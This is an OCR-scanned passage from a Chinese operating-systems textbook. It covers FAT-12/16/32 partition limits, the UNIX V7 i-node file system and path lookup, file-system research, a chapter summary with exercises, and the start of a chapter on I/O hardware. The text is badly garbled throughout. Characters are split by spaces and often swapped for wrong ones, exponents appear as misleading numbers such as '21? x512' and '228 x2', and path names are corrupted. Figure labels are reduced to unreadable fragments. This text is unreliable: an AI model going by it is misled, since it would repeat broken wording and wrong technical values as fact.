的 低 28 位 ， 它 更 应 该 叫 FAT-28。 但 使 用 2 的 早 的 这 种 表述 听 起 来 要 勾 整 
得 多 。 





在 所 有 的 FAT 中 ， 都 可 以 把 磁盘 块 大 小 调整 到 512 字 节 的 倍数 不 
同 的 分 区 可 能 采用 不 同 的 倍数 ) ， 合 法 的 块 大 小 《微软 称 之 为 簇 大 小 ) 
在 不 同 的 FAT 中 也 会 有 所 不 同 。 第 一 版 的 MS-DOS 使 用 块 大 小 为 512 字 节 
的 FAT-12， 分 区 大 小 最 大 为 21? x512 字 节 (实际 上 只 有 4086x512 字 节 ， 











因为 有 10 个 磁盘 地 址 被 用 作 特 殊 的 标记 ， 如 文件 的 结尾 、 坏 块 等 ) 。 根 
据 这 些 参 数 ， 最 大 的 磁盘 分 区 大 小 约 为 2MB， 而 内 存 里 的 FAT 表 中 有 
4096 个 项 ， 每 项 2 字 市 16 位，。 硅 使 用 12 位 的 目录 项 则 会 非常 慢 。 








这 个 系统 在 软盘 条 件 下 工作 得 很 好 ， 但 当 硬 盘 出 现时 ， 它 就 出 现 问 
题 了 。 微 软 通过 人 允许 其 他 的 块 大 小 如 C1KB，2KB,4KB) 来 解决 这 个 问 
题 。 这 个 修改 保留 了 FAT-12 表 的 结构 和 大 小 ， 但 是 允许 可 达 16 MB 的 人 磁 


由 于 MS-DOS 支 持 在 每 个 磁盘 驱动 器 中 划分 四 个 磁盘 分 区 ， 所 以 新 
的 FAT-12 文 件 系 统 可 在 最 大 64MB 的 磁盘 上 工作 。 除 此 之 外 ， 还 必须 引 
入 新 的 内 容 。 于 是 就 引进 了 FAT-16， 它 有 16 位 的 磁盘 指针 ， 而 且 人 允许 
8KB、16KB 和 32KB 的 块 大 小 〈32 768 是 用 16 位 可 以 表示 的 2 的 最 大 
we) 。FAT-16 表 需要 占据 内 存 128KB 的 空间 。 由 于 当时 已 经 有 更 大 的 内 
存 ， 所 以 它 很 快 就 得 到 了 应 用 ， 并 且 取 代 了 FAT-12 系 统 。FAT-16 能 够 
支持 的 最 大 磁盘 分 区 是 2GB 〈64K 个 项 ， 每 个 项 32KB) ， 支 持 最 大 8GB 
的 磁盘 ， 即 4 个 分 区 ， 每 个 分 区 2GB。 

















对 于 商业 信函 来 说 ， 这 个 限制 不 古 问题 ， 但 对 于 存储 采用 DV 标准 
的 数字 视频 来 说 ， 一 个 2GB 的 文件 仅 能 保存 9 分 钟 多 一 后 的 视频 。 结 
就 是 无 论 磁 盘 有 多 大 ，PC 的 磁盘 也 只 能 文 持 四 个 分 区 ， 能 存储 在 磁盘 
中 的 最 长 的 视频 大 约 是 38 分 钟 。 这 一 限制 也 意味 独 ， 能 够 在 线 编辑 的 最 
大 的 视频 少 于 19 分 钟 ， 因 为 同时 需要 输入 和 输出 文件 。 








随 着 Windows 95 第 2 版 的 发 行 ， 引 入 了 FAT-32 文 件 系 统 ， 它 具有 28 
位 磁盘 地 址 。 在 Windwos 95 下 的 MS-DOS 也 被 改造 ， 以 适应 FAT-32。 在 
这 个 系统 中 ， 分 区 理论 上 能 达到 228 x2 字 节 ， 但 实际 上 是 限制 在 
2TB (2048GB) ， 因 为 系统 在 内 部 的 512 字 节 长 的 扇 区 中 使 用 了 一 个 32 
位 的 数字 来 记录 分 区 的 大 小 ， 这 样 29 x23? 是 2TB。 对 应 不 同 的 块 大 小 以 
及 所 有 三 种 FAT 类 型 的 最 大 分 区 都 在 图 4-32 中 表示 出 来 。 
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图 4-32 对 应 不 同 的 块 大 小 的 最 大 分 区 (空格 表示 禁止 这 种 组 合 ) 
























除了 支持 更 大 的 磁盘 之 外 ，FAT-32 文 件 系统 相 比 FAT-16 文 件 系统 
有 另外 两 个 优点 。 首 先 ， 一 个 用 FAT-32 的 8GB 磁 盘 可 以 是 一 个 分 区 ， 而 
使 用 FAT-16 则 必须 是 四 个 分 区 ， 对 于 Windows 用 户 来 说 ， 就 
是 “C:”、“D:”、 中 :和 呈 :” 逻 辑 磁盘 了 驱动器。 用户 可 以 自己 决定 哪个 文 
件 放 在 哪个 盘 以 及 记录 的 内 容 放 在 什么 地 方 。 


FAT-32 相 对 于 FAT-16 的 另外 一 个 优点 是 ， 对 于 一 个 给 定 大 小 的 便 
盘 分 区 ， 可 以 使 用 一 个 小 一 点 的 块 大 小 。 例 如 ， 对 于 一 个 2GB 的 硬盘 分 
区 ，FAT-16 必 须 使 用 32KB 的 块 ， 人 否则 仅 有 的 64K 个 磁盘 地 址 就 不 能 和 
盖 整 个 分 区 。 相 反 ，FAT-32 处 理 一 个 2GB 的 硬盘 分 区 的 时 候 就 能 够 使 用 
4KB 的 块 。 使 用 小 块 的 好 处 是 大 部 分 文件 都 小 于 32KB。 如 果 块 大 小 是 
32KB， 那 么 一 个 10 字 节 的 文件 就 占用 32KB 的 空间 ， 如 果 文 件 平均 大 小 
是 8KB， 使 用 32KB 的 块 大 小 ，3/4 的 磁盘 空间 会 被 浪费 ， 这 不 是 使 用 磁 
盘 的 有 效 方法 。 而 8KB 的 文件 用 4KB 的 块 没 有 空间 的 损失 ， 却 会 有 更 多 
的 RAM 被 FAT 系 统 占用 。 把 4KB 的 块 应 用 到 一 个 2GB 的 磁盘 分 区 ， 会 有 
512K 个 块 ， 所 以 FAT 系 统 必 须 在 内 存 里 包含 512K 个 项 〈 占 用 了 2MB 的 
RAM) 。 





MS-DOS 使 用 FAT 来 跟踪 空 闪 磁盘 块 。 当 前 没有 分 配 的 任何 块 都 会 
标 上 一 个 特殊 的 代码 。 当 MS-DOS 需 要 一 个 新 的 磁盘 块 时 ， 它 会 搜索 
FAT 以 找到 一 个 包含 这 个 代码 的 项 。 所 以 不 需要 位 图 或 者 空闲 表 。 





4.5.3 UNIX V7 文件 系统 


即使 是 早期 版 本 的 UNIX 也 有 一 个 相当 复杂 的 多 用 户 文件 系统 ， 因 
为 它 是 从 MULTICS 继 承 下 来 的 。 下 面 我 们 将 会 讨论 V7 文件 系统 ， 这 是 
为 PDP-11 创 建 的 一 个 文件 系统 ， 它 也 使 得 UNIX 闻 名 于 世 。 我 们 将 在 第 
10 章 通过 Linux 讨 论 现 代 UNIX 的 文件 系统 。 


文件 系统 从 根 目录 开始 形成 树 状 ， 加 上 链接 ， 形 成 了 一 个 有 向 无 环 
图 。 文 件 名 可 以 多 达 14 个 字符 ， 能 够 容纳 除了 /和 NUL 之 外 的 任何 ASCII 
字符 ，NUL 也 表示 成 数字 数值 0。 











UNIX 目 录 中 为 每 个 文件 保留 了 一 项 。 每 项 都 很 简单 ， 因 为 UNIX 使 
用 i 节点 ， 如 图 4-13 中 所 示 。 一 个 目录 项 包含 了 两 个 域 ， 文 件 名 14 个 字 
节 ) 和 i 节点 的 编号 (2 个 字 节 ) ， 如 图 4-33 所 示 。 这 些 参数 决定 了 每 个 
文件 系统 的 文件 数目 为 64K。 





图 433 UNIXYV7 的 目录 表 项 


就 像 图 4-13 中 的 i 节 点 一 样 ，UNIX 的 i 节 点 包含 一 些 属性 。 这 些 属性 
包括 文件 大 小 、 三 个 时 间 (创建 时 间 ， 最 后 访问 时 间 ， 最 后 修改 时 
间 ) 、 所 有 者 、 所 在 组 、 保 护 信 息 以 及 一 个 计数 《用 于 记录 指向 i 节 点 
的 目录 项 的 数量 ) 。 最 后 一 个 域 是 为 了 链接 而 设 的 。 当 一 个 新 的 链接 加 
到 一 个 i 节点 上 ，i 节 点 里 的 计数 就 会 加 1。 当 移 走 一 个 连接 时 ， 该 计数 就 
减 1。 当 计数 为 0 时 ， 束 收回 该 节点 ， 并 将 对 应 的 磁盘 块 放 进 空间 表 。 








对 于 特别 大 的 文件 ， 可 以 通过 图 4-13 所 示 的 方法 来 跟踪 磁盘 块 。 前 
10 个 磁盘 地 址 是 存储 在 i 节点 自身 中 的 ， 所 以 对 于 小 文件 来 说 ， 所 有 必 
需 的 信息 恰好 是 在 i 节 点 中 。 而 当 文件 被 打开 时 ，i 节 点 将 被 从 磁盘 取 到 
内 存 中 。 对 于 大 一 些 的 文件 ,i 节点 内 的 其 中 一 个 地 址 是 称 为 一 次 间接 
块 (single indirect block) 的 磁盘 块 地 址 。 这 个 块 包含 了 附加 的 磁盘 地 
址 。 如 果 还 不 够 的 话 ， 在 i 节点 中 还 有 男 一 个 地 址 ， 称 为 二 次 间接 块 
(double indirect block〉。 它 包含 一 个 块 的 地 址 ， 在 这 个 块 中 包含 耕 干 
个 一 次 间接 块 。 每 一 个 这 样 的 一 次 间接 块 指 向 数 百 个 数据 块 。 如 果 这 样 
还 不 够 的 话 ， 可 以 使 用 三 次 间接 块 (triple indirect block) 。 整 个 情况 参 
见 图 4-34。 
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图 4-34 一 个 UNIX 的 i 节点 


当 打 开 某 个 文件 时 ， 文 件 系统 必须 要 获得 文件 名 并 且 定 位 它 所 在 的 
磁盘 块 。 让 我 们 来 看 一 下 怎样 查找 路 径 名 /usrasVymbox。 以 UNIX 为 例 ， 
但 对 所 有 的 层次 目录 系统 来 说 ， 这 个 算法 是 大 致 相同 的 。 首 先 ， 文 件 系 
统 定位 根 目 录 。 在 UNIX 系 统 中 ， 根 目录 的 i 节 点 存放 于 磁盘 上 固定 的 位 
置 。 从 这 个 i 节点， 系统 将 可 以 定位 根 目 录 ， 虽 然 根 目录 可 以 放 在 磁盘 
上 的 任何 位 置 ， 但 假定 它 放 在 磁盘 块 1 的 位 置 。 


























接 下 来 ， 系 统 读 根 目录 并 且 在 根 目录 中 查找 路 径 的 第 一 个 分 量 
usr， 以 获取 /usr 目 录 的 i 节点 号 。 由 i 闻 感 号 来 定位 i 节点 是 很 直接 的 ， 
为 每 个 i 贡 点 在 磁盘 上 都 有 固定 的 位 置 。 根 据 这 个 im 点 ， 系 统 定位 /usr 目 














录 并 在 其 中 查找 下 一 个 分 量 ast。 一 旦 找到 ast 的 项 ， 便 找到 了 /usr/ast 目 录 
的 节点。 依据 这 个 节点， 可 以 定位 该 目录 并 在 其 中 查找 mbox。 然 后 ， 
这 个 文件 的 i 节点 被 读 入 内 存 ， 并 且 在 文件 关闭 之 前 会 一 直 保 留 在 内 存 
中 。 图 4-35 显 示 了 碍 找 的 过 程 。 





块 132 是 /usrast 的 块 406 是 
/usr 目 录 i 节点 26 usr/ast 目 录 





i 节点 26 说 明 er 
EE ERNA /usr/ast 在 块 usr/ast/mbDOX 
i 节 点 6 /usr 在 块 l 32} 1H 点 26 k 是 他 点 60 


5 ij 节点 6 说 日 ust 是 
奉 找 ust 得 到 i 节点 6 说 明 /usr/ast 是 


图 4-35 查找 /ust/ast/mbox 的 过 程 





相对 路 径 名 的 碍 找 同 绝对 路 径 的 查找 方法 相同 ， 只 不 过 是 从 当前 工 
作 目 录 开 始 碍 找 而 不 是 从 根 目 录 开 始 。 每 个 目录 都 有 .和 .. 项 ， 它 们 是 在 
目录 创建 的 时 候 同 时 创建 的 。. 表 项 是 当前 目录 的 证 点 号 ， 而 .. 表 项 是 父 




















目录 〈 上 一 层 目录 ) 的 i 节点 号 。 这 样 ， 查 找 ../dick/prog.c 的 过 程 束 成 为 
在 工作 目录 中 查找 ..， 寻 找 父 目录 的 i 节点 号 ， 并 查询 dick 目 录 。 不 需要 
专门 的 机 制 处 理 这 些 名 字 。 目 录 系 统 只 要 把 这 些 名 字 看 作 普 通 的 ASCII 











字符 串 即 可 ， 如 同 其 他 的 名 字 一 样 。 这 里 惟一 的 巧妙 之 处 是 .在 根 目录 
中 指向 自身 。 


46 有关 文件 系统 的 研究 


文件 系统 总 是 比 操作 系统 的 其 他 部 分 吸引 了 更 多 的 研究 ， 现 在 也 是 
这 样 。 当 标准 的 文件 系统 被 完全 理解 后 ， 现 在 还 有 很 多 后 续 的 关于 优化 
高 速 缓存 管理 的 研究 (Burnett 等 人 ，2002; Ding 等 人 ，2007; Gnaidy 等 





人 ，2004; Kroeger 和 Long，2001; Pai 等 人 ，2000; 以 及 Zhou 等 人 ， 
2001) 。 后 续 的 工作 还 有 关于 新 类 型 的 文件 系统 ， 例 如 用 户 级 别 的 文件 
系统 (Mazi eres，2001) ， 闪 和 存 文件 系统 Gal 等 人 ，2005)〉 , HEX 
{FAS 〈Prabhakaran 等 人 ，2005;， 以 及 Stein 等 人 ，2001) ， 版 本 控制 
(versioning) 文件 系统 (Cornell 等 人 ，2004) ， 对 等 (peer-to-peer) X 
件 系 统 (Muthitacharoen 等 人 ，2002) ， 以 及 其 他 。Google 文 件 系统 也 
不 寻常 ， 因 为 它 有 极 好 的 容错 性 能 “Ghemawat 等 人 ，2003) 。 文 件 系 
统 内 不 同 的 得 询 方法 也 是 很 有 意义 〈Padioleau 和 Ridoux，2003) 。 








男 一 个 受到 关注 的 领域 是 起 源 (provenance) 追踪 数据 的 历 
史 ， 包 括 它 们 来 自 哪 里 ， 谁 拥有 和 它们， 以 及 它们 是 如 何 转换 的 
(Muniswarmy-Reddy 等 人 ，2006; 以 及 Shah 等 人 ，2007) 。 这 个 信息 
可 以 以 不 同 的 方式 加 以 运用 。 备 份 也 一 直 受 到 关注 (Cox 等 人 ，2002; 
以 及 Rycroft 等 人 ，2006) ， 如 同 恢复 的 相关 主题 一 样 Keeton“ A, 
2006) 。 与 备份 有 关 的 还 有 ， 设 法 保持 数据 几 十 年 ， 并 仍旧 可 以 使 用 
(Baker 等 人 ，2006; Maniatis 等 人 ，2003) 。 可 靠 性 与 安全 性 也 是 需要 





解决 的 问题 (Greenan 和 Miller，2006; Wires 和 Feeley，2007; Wright 等 
人 ，2007; 以 及 Yang 等 人 ，2006) 。 最 后 ， 性 能 始终 是 一 个 值得 研究 的 
主题 (Caudill 和 Gavrikovska，2006; Chiang 和 Huang，2007; Stein, 
2006; Wang 等 人 ，2006a; 以 及 Zhang 和 Ghose，2007) 。 


4.7 25 


从 外 部 看 ， 文 件 系统 是 一 组 文件 和 目录 ， 以 及 对 文件 和 目录 的 操 
作 。 文 件 可 以 被 读 写 ， 目录 可 以 被 创建 和 删除 ， 并 可 将 文件 从 一 个 目录 
移 到 另 一 个 目录 中 。 大 多 数 现代 操作 系统 都 文 持 层 次 目录 系统 ， 其 中 ， 
目录 中 还 有 子 目录 ， 子 目录 中 还 可 以 有 子 目 录 ， 如 此 无 限 下 去 。 











而 在 内 部 看 ， 文 件 系统 又 是 另 一 番 景 象 。 文 件 系统 的 设计 者 必须 考 
虑 存储 区 是 如 何 分 配 的 ， 系 统 如 何 记录 哪个 块 分 给 了 哪个 文件 。 可 能 的 
方案 有 连续 文件 、 链 表 、 文 件 分 配 表 和 i 节点 等 。 不 同 的 系统 有 不 同 的 
目录 结构 。 属 性 可 以 存在 目录 中 或 存在 别处 比如， 在 i 节点 中 )〉 o 
盘 空 间 可 以 通过 位 图 的 空闲 表 来 管理 。 通 过 增 量 转 储 以 及 用 程序 修复 故 
隐 文 件 系统 的 方法 ， 可 以 提高 文件 系统 的 可 靠 性 。 文 件 系 统 的 性 能 非常 
重要 ， 可 以 通过 多 种 途径 提高 性 能 ， 包 括 高 速 缓存 、 预 读 取 以 及 尽 可 能 
仔细 地 将 一 个 文件 中 的 块 紧密 地 放置 在 一 起 等 方法 。 日 志 结 构 文件 系统 
通过 大 块 单元 写 入 的 操作 也 可 以 改善 性 能 。 














文件 系统 的 例子 有 ISO 9660、MS-DOS 以 及 UNIX。 它 们 之 间 在 怎样 
记录 每 个 文件 所 使 用 的 块 、 目 录 结 构 以 及 对 空闲 磁盘 空间 管理 等 方面 都 
存在 着 差别 。 





习题 


1. 在 早期 的 UNIX 系 统 中 ， 可 执行 文件 〈a.out) 以 一 个 非常 特别 的 
魔 数 开始 ， 这 个 数 不 是 随机 选择 的 。 这 些 文件 都 有 文件 头 ， 后 面 是 正文 
段 和 数据 段 。 为 什么 要 为 可 执行 文件 挑选 一 个 非常 特别 的 魔 数 ， 而 其 他 
类 型 文件 的 第 一 个 字 反 而 有 一 个 或 多 或 少 是 随机 选择 的 魔 数 ? 








2. 在 图 4-4 中 ， 一 个 属性 是 记录 长 度 。 为 什么 操作 系统 要 关心 这 个 属 
性 ? 


3. 在 UNIX 中 open 系 统 调用 绝对 需要 吗 ? 如果 没有 会 产生 什么 结果 ? 


4. 在 支持 顺序 文件 的 系统 中 总 有 一 个 文件 回 六 操作 ， 支 持 随 机 存 取 
文件 的 系统 是 否 也 需要 该 操作 ? 


5. 某 一 些 操作 系统 提供 系统 调用 rename 给 文件 重 命 名 ， 同 样 也 可 以 
通过 把 文件 复制 到 新 文件 并 删除 原文 件 而 实现 文件 重 命名 。 请 问 这 两 种 
方法 有 何不 同 ? 








6. 在 有 些 系统 中 有 可 能 把 部 分 文件 映射 进 内 存 中 。 如 此 一 来 系统 应 
该 施加 什么 限制 ? 这 种 部 分 映射 如 何 实现 ? 





7. 有 一 个 简单 操作 系统 只 支持 单一 目录 结构 ， 但 是 允许 该 目录 中 有 
任意 多 个 文件 ， 且 带 有 任意 长 度 的 名 字 。 这 样 可 以 模拟 层次 文件 系统 











吗 ? 如 何 进行 ? 

8. 在 UNIX 和 Windows 中 ， 通 过 使 用 一 个 特殊 的 系统 调用 把 文件 
的 “当前 位 置 ?指针 移 到 指定 字 节 ， 从 而 实现 了 随机 访问 。 请 提出 一 个 不 
使 用 该 系统 调用 完成 随机 存 取 的 蔡 代 方案 。 








9. 考 虑 图 4-8 中 的 目录 树 ， 如 果 当 前 工作 目录 是 /swjimn， 则 相对 路 径 
名 为 .JastX 的 文件 的 绝对 路 径 名 是 什么 ? 


10. 正 如 书 中 所 提 到 的 ， 文 件 的 连续 分 配 会 导致 磁盘 碎片 ， 因 为 当 
一 个 文件 的 长 度 不 等 于 块 的 整数 倍 时 ， 文 件 中 的 最 后 一 个 磁盘 块 中 的 空 
ZIRE. Re A LEIER? 并 将 它 与 先前 一 章 的 有 关 讨 
论 进 行 比较 。 











11. 一 种 在 磁盘 上 连续 分 配 并 且 可 以 避免 空洞 的 方案 是 ， 每 次 删除 
一 个 文件 后 就 紧缩 一 下 磁盘 。 由 于 所 有 的 文件 都 是 连续 的 ， 复 制 文件 时 
需要 寻 道 和 旋转 延迟 以 便 读 取 文 件 ， 然 后 全 速 传送 。 在 写 回 文件 时 要 做 
同样 的 工作 。 假 设 寻 道 时 间 为 5ms， 旋 转 延 迟 为 4 ms， 传 送 速率 为 
8MB/s， 而 文件 平均 长 度 是 8 KB， 把 一 个 文件 读 入 内 存 并 写 回 到 磁盘 上 
的 一 个 新 位 置 需要 多 长 时 间 ? 运用 这 些 数字 ， 计 算 紧 缩 16GB 人 磁盘 的 一 
半 需 要 多 长 时 间 ? 


12. 基 于 前 一 个 问题 的 答案 ， 紧 缩 磁 盘 有 什么 作用 吗 ? 


13. 茶 些 数 字 消 费 设 备 需 要 存储 数据 ， 比 如 存放 文件 等 。 给 出 一 个 
现代 设备 的 名 字 ， 该 设备 需要 文件 存储 ， 并 且 对 文件 运用 连续 分 配 空间 
的 方法 是 不 错 的 方法 。 








14.MS-DOS 如 何在 文件 中 实现 随机 访问 ? 


15. 考 虑 图 4-13 中 的 这 点 。 如 果 它 含有 用 4 个 字 节 表示 的 10 个 直接 地 
址 ， 而 且 所 有 的 磁盘 块 大 小 是 1024KB， 那 么 文件 最 大 可 能 有 多 大 ? 














16. 有 建议 将， 把 短文 件 的 数据 存在 i 节 点 之 内 会 提高 效率 并 且 节 省 
磁盘 空间 。 对 于 图 4-13 中 的 i 节 点 ， 在 i 节 点 之 内 可 以 存放 多 少 字 节 的 数 
据 ? 











17. 两 个 计算 机 科学 系 的 学 生 Carolyn 和 Elinor 正 在 讨论 i 节 点 。 
Carolyn 认 为 存储 器 容量 越 来 越 大 ， 价 格 越 来 越 便宜 ， 所 以 当 打 开 文 件 
时 ， 直 接 取 i 节点 的 副本 ， 放 到 内 存 i 节点 表 中 ， 建 立 一 个 新 i 节点 将 更 简 
单 、 更 快 ， 没 有 必要 搜索 整个 节点 来 判断 它 是 否 已 经 存在 。Elinor 则 不 
同意 这 一 观点 。 他 们 两 个 人 谁 对 ? 








18. 说 明 硬 连接 优 于 符号 链接 的 一 个 优点 ， 并 说 明 符号 链接 优 于 便 
连接 的 一 个 优 后 。 





19. 空 闲 磁 盘 空 间 可 用 空闲 块 表 或 位 图 来 跟踪 。 假 设 磁盘 地 址 需要 D 
位 ， 一 个 磁盘 有 B 个 块 ， 其 中 有 F 个 空间 。 在 什么 条 件 下 ， 空 闲 块 表 采 








用 的 空间 少 于 位 图 ?” 设 D 为 16 位 ， 请 计算 空闲 磁盘 空间 的 百分比 。 


20. 一 个 空闲 块 位 图 开始 时 和 磁盘 分 区 首次 初始 化 类 似 ， 比 如 : 
1000 0000 0000 0000《“ 首 块 被 根 目录 使 用 ) ， 系 统 总 是 从 最 小 编号 的 盘 
块 开始 寻找 空闲 块 ， 所 以 在 有 6 块 的 文件 A 写 入 之 后 ， 该 位 图 为 1111 
1110 0000 0000。 请 说 明 在 完成 如 下 每 一 个 附加 动作 之 后 位 图 的 状态 : 











a) 写 入 有 5 块 的 文件 B。 
b) 删 除 文件 A。 
oO 写 入 有 8 块 的 文件 C。 
d) 删 除 文件 B。 


21. 如 果 因 为 系统 裔 溃 而 使 存放 空闲 磁盘 块 信 息 的 空闲 块 表 或 位 图 
完全 丢失 ， 会 发 生 什 么 情况 ? 有 什么 办 法 从 这 个 灾难 中 恢复 吗 ， 还 是 与 
该 磁盘 彻底 再 见 ? 分 别 就 UNIX 和 FAT-16 文 件 系统 讨论 你 的 答案 。 





22.Oliver Owl 在 大 学 计算 中 心 的 工作 是 更 换 用 于 通宵 数据 备份 的 磁 
市 ， 在 等 竺 每 盘 磁 带 完 成 的 同时 ， 他 在 写 一 篇 毕业 论文 ， 证 明 莎 士 比 亚 
戏剧 是 由 外 星 访客 写成 的 。 由 于 仅 有 一 个 系统 ， 所 以 只 能 在 正在 做 备份 
的 系统 上 运行 文本 编辑 程序 。 这 样 的 安排 有 什么 问题 吗 ? 


23. 在 教材 中 我 们 详细 讨论 过 增 量 转 储 。 在 Windows 中 很 容易 说 明 何 


时 要 转 储 一 个 文件 ， 因 为 每 个 文件 都 有 一 个 存档 位 。 在 UNIX 中 没有 这 
个 位 ， 那 么 UNIX 备 份 程序 怎样 知道 哪个 文件 需要 转 储 ? 


24. 假 设 图 4-25 中 的 文件 21 自 上 次 转 储 之 后 没有 修改 过 ， 在 什么 情况 
下 图 4-26 中 的 四 张 位 图 会 不 同 ? 


25. 有 人 建议 每 个 UNIX 文 件 的 第 一 部 分 最 好 和 其 i 市 点 放 在 同一 个 磁 
盘 块 中 ， 这 样 做 有 什么 好 处 ? 





26. 考 虑 图 4-27。 对 东 个 特殊 的 块 号 ， 计 数 器 的 值 在 两 个 表 中 有 没有 
可 能 都 是 数值 2? 这 个 问题 如 何 纠正 ? 


27. 文 件 系 统 的 性 能 与 高 速 缓存 的 命中 率 有 很 大 的 关系 〈 即 在 高 速 
缓存 中 找到 所 需 块 的 概率 ) 。 从 高 速 缓 仓 中 该 取 数 据 需 要 lms， 而 从 破 
盘 上 读 取 需要 40ms， 若 命中 率 为 h， 给 出 读 取 数据 所 需 平均 时 间 的 计算 
公式 。 并 画 出 hb 从 0 到 1.0 变 化 时 的 函数 曲线 。 





28. 考 虑 图 4-21 背 后 的 思想 ， 目 前 磁盘 平均 寻 道 时 间 为 8ms， 旋 转速 
率 为 15 000rpm， 每 道 为 262 144 字 节 。 对 大 小 各 为 IKB、2KB 和 4KB 的 
磁盘 块 ， 传 送 速率 各 是 多 少 ? 


29. 东 个 文件 系统 使 用 2KB 的 磁盘 块 ， 而 中 间 文 件 大 小 值 为 IKB。 如 
有 果 所 有 的 文件 都 是 正好 1KB 大 ， 那 么 溪 费 掉 的 磁盘 空间 的 比例 是 多 少 ? 
你 认为 一 个 真正 的 文件 系统 所 浪费 的 空间 比 这 个 数值 大 还 是 小 ?请 说 明 


理由 。 


30.MS-DOS 的 FAT-16 表 有 64K 个 表 项 ， 假 设 其 中 的 一 位 必须 用 于 其 
他 用 途 ， 这 样 该 表 就 只 有 32 768 个 表 项 了 。 如 果 没 有 其 他 修改 ， 在 这 个 
条 件 下 最 大 的 MS-DOS 文 件 有 多 大 ? 





31.MS-DOS 中 的 文件 必须 在 内 存 中 的 FAT-16 表 中 竞争 空间 。 如 果 
某 个 文件 使 用 了 k 个 表 项 ， 其 他 任何 文件 就 不 能 使 用 这 k 个 表 项 ， 这 样 会 
对 所 有 文件 的 总 长 度 带 来 什么 限制 ? 





32. 一 个 UNIX 系 统 使 用 1KB 人 磁盘 块 和 4 字 市 磁盘 地 址 。 如 果 每 个 i 节 
点 中 有 10 个 直接 表 项 以 及 一 个 一 次 间接 块 、 一 个 二 次 间接 块 和 一 个 三 次 
间接 块 ， 那 么 文件 的 最 大 尺寸 是 多 少 ? 

33. 对 于 文件 /usr/ast/courses/os/handout.t， 若 要 调 入 其 i 节点 需要 多 少 


个 磁盘 操作 ? 假设 其 根 目 录 的 i 节 点 在 内 存 中 ， 其 他 路 径 都 不 在 内 存 
中 。 并 假设 所 有 的 目录 都 在 一 个 磁盘 块 中 。 











34. 在 许多 UNIX 系 统 中 ， 证 点 存放 在 磁盘 的 开始 之 处 。 一 种 蔡 代 设 
计 方 案 是 ， 在 文件 创建 时 分 配 i 节 点 ， 并 把 i 节点 存放 在 该 文件 首 个 人 磁盘 
块 的 开始 之 处 。 请 讨论 这 个 方案 的 优 缺 点 。 











35. 编 写 一 个 将 文件 字 节 倒 写 的 程序 ， 这 样 最 后 一 个 字 节 成 为 第 一 
个 字 节 ， 而 第 一 个 字 节 成 为 最 后 一 个 字 节 。 程 序 必 须 适 合 任何 长 度 的 文 





件 ， 并 保持 适当 的 效率 。 


36. 编 写 一 个 程序 ， 该 程序 从 给 定 的 目录 开始 ， 从 此 点 开始 沿 目录 
树 向 下 ， 记 录 所 找到 的 所 有 文件 的 大 小 。 在 完成 这 一 切 之 后 ， 该 程序 应 
该 打印 出 文件 大 小 分 布 的 直方 图 ， 以 该 直方 图 的 区 间 宽 度 为 参数 〈 比 
如 ， 区 间 宽 度 为 1024， 那 么 大 小 为 0 一 1023 的 文件 同 在 一 个 区 间 宽 度 ， 
大 小 为 1024 一 2047 的 文件 同 在 下 一 个 区 间 宽 度 ， 如 此 类 推 ) 。 





37. 编 写 一 个 程序 ， 扫 描 UNIX 文 件 系 统 中 的 所 有 目录 ， 并 太 现 和 害 
位 有 两 个 或 更 多 硬 连接 计数 的 i 节 点 。 对 于 每 个 这 样 的 文件 ， 列 出 指向 
该 文件 的 所 有 文件 的 名 称 。 





38. 编 写 UNIX 的 新 版 Is 程序 。 这 个 版 本 将 一 个 或 多 个 目录 名 作为 变 
量 ， 并 列 出 每 个 目录 中 所 有 的 文件 ， 一 个 文件 一 行 。 每 个 域 应 该 对 其 类 
型 进行 合理 的 格式 化 。 仅 列 出 第 一 个 磁盘 地 址 〈“ 知 该 地 址 存在 的 话 ) 。 








第 5 半 ”输入 /输出 


除了 提供 抽象 (例如 ， 进 程 《 和 线程 ) 、 地 址 空间 和 文件 ) 以 外 ， 
操作 系统 还 要 控制 计算 机 的 所 有 WO 输入 /输出 ) 设备。 操作 系统 必须 
向 设备 发 送 命令 ， 捕 提 中 断 ， 并 处 理 设备 的 各 种 错误 。 它 还 应 该 在 设备 
和 系统 的 其 他 部 分 之 间 提 供 简 单 且 易 于 使 用 的 接口 。 如 果 有 可 能 ， 这 个 
接口 对 于 所 有 设备 都 应 该 是 相同 的 ， 这 束 是 所 谓 的 设备 无 天 性 。IO 部 
分 的 代码 是 整个 操作 系统 的 重要 组 成 部 分 。 操 作 系统 如 何 管理 MO 是 本 


章 的 主题 。 








本 章 的 内 容 是 这 样 组 织 的 ， 首 先 介 绍 WO 硬 件 的 基本 原理 ， 然 后 介 
绍 一 般 的 VO 软件 。L/O 软 件 可 以 分 层 构 造 ， 每 层 都 有 明确 的 任务 。 我 们 
将 对 这 些 软件 层 进 行 研究 ， 看 一 看 它们 做 些 什 么 ， 以 及 如 何在 一 起 配合 
Antes 


在 此 之 后 将 详细 介绍 几 种 IO 设备 : 磁盘 、 时 钟 、 键 盘 和 显示 器 。 
对 于 每 一 种 设备 我 们 都 将 从 硬件 和 软件 两 方面 加 以 介绍 。 最 后 ， 我 们 还 


将 介绍 电源 管理 。 


5.1 IO 硬件 原理 





不 同 的 人 对 于 IO 硬件 的 理解 是 不 同 的 。 对 于 电子 工程 师 而 言 ，IO 
人 硬件 就 是 芯片 、 导 线 、 电 源 、 电 机 和 其 他 组 成 硬件 的 物理 部 件 。 对 程序 
员 而 言 ， 则 只 注意 IO 硬件 提供 给 软件 的 接口 ， 如 硬件 能 够 接收 的 命 
令 、 它 能 够 完成 的 功能 以 及 它 能 够 报告 的 错误 。 本 书 主 要 介绍 怎样 对 
1/O 设 备 编程 ， 而 不 是 如 何 设计 、 制 造 和 维护 硬件 ， 因 此 ， 我 们 的 讨论 
限于 如 何 对 硬件 编程 ， 而 不 是 其 内 部 的 工作 原理 。 然 而 ， 很 多 IO 设备 
的 编程 常常 与 其 内 部 操作 密切 相关 。 在 下 面 三 节 中 ， 我 们 将 介绍 与 VO 
硬件 编程 有 关 的 一 般 性 背景 知识 。 这 些 内 容 可 以 看 成 是 对 1.4 节 介绍 性 
材料 的 复习 和 扩充 。 





5.1.1 IO 设备 


IO 设备 大 致 可 以 分 为 两 类 : 块 设备 (block device) 和 字符 设备 
(character device) 。 块 设备 把 信息 存储 在 固定 大 小 的 块 中 ， 每 个 块 有 
自己 的 地 址 。 通 常 块 的 大 小 在 512 字 节 至 32 768 字 节 之 间 。 所 有 传输 以 
一 个 或 多 个 完整 的 “连续 的 ) 块 为 单位 。 块 设备 的 基本 特征 是 每 个 块 都 
